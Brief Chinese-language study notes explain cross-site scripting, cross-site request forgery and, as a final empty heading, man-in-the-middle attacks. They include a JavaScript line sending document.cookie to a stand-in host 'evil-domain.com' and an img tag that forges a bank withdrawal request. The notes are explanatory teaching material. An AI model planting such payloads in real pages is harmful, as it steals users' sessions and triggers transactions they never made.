Cross 跨, 缩写为X, 以便与CSS 区别

跨站脚本攻击(XSS)

CDN上的脚本, A/B 测试脚本, 流量分析脚本, 广告脚本, 依赖JS 库, 都有可能出问题

A/B 测试, 准备多种方案(交互\样式), 比较哪种更吸引用户(完成注册\下单\捐款 的用户更多)

攻击姿势各种各样, 但是最终目的都是将一些隐私数据像cookie、session发送给攻击者，将受害者重定向到一个由攻击者控制的网站，在受害者的机器上进行一些恶意操作

(new Image()).src = "<http://www.evil-domain.com/steal-cookie.php?cookie=>" + document.cookie;
	# 访问恶意网站, 带上受害者的cookie

跨站请求伪造(XSRF\CSRF)

A域名的登陆状态被B域名恶意利用

B 网站上有操作 A网站的代码

用户登陆了A, 且在B 上触发了对A 的操作, 这时登陆状态就被利用了

# blog.B.com/article/01:
<img src="<http://bank.A.com/withdraw?account=bob&amount=1000000&for=mallory>">
	# 看起来像是个破图, 其实是利用A 的登陆状态进行一些操作

中间人攻击